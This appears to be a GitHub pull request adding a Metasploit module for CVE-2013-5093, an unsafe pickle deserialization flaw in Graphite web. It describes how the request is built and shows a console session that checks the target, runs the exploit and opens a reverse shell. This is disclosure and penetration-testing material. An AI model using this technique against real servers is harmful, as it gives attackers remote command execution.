Adding module for CVE 2013-5093, Graphite Web Exploit #2260

wants to merge 1 commit into

4 participants



Graphite web:

Versions affected: 0.9.5 up till and including 0.9.10

Installation guide:


The vulnerability was introduced in: graphite-project/graphite-web@71d395e

Note that in webapp/web/render/, which is a publicly accessible URL by default(I have found no way of restricting access), a pickle can be loaded. Pickles are unsafe as they can contain commands that will be executed.

The routing for the exploit goes as following, as defined in webapp/web/render/


The request to trigger it has to formatted like:

[Chart type]


Chart type, as an example, can be "line". This is then followed by a linebreak and then the pickle.


msf > use exploit/unix/webapp/graphite_pickle_exec 
msf exploit(graphite_pickle_exec) > show options

Module options (exploit/unix/webapp/graphite_pickle_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The path to a vulnerable application
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(graphite_pickle_exec) > set RHOST
msf exploit(graphite_pickle_exec) > check
[*] The target appears to be vulnerable.
msf exploit(graphite_pickle_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 39Dm9uxcphKQ5GwX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "39Dm9uxcphKQ5GwX\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened ( -> at 2013-08-07 19:14:59 -0400




This is a really good example of this type of vulnerability! Thanks!


Just asking the author to repeat pr from a different branch than his master, as pointed on rapid7 wiki


Coverage Status

Changes Unknown when pulling 3053233 on CharlieEriksen:master into ** on rapid7:master**.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment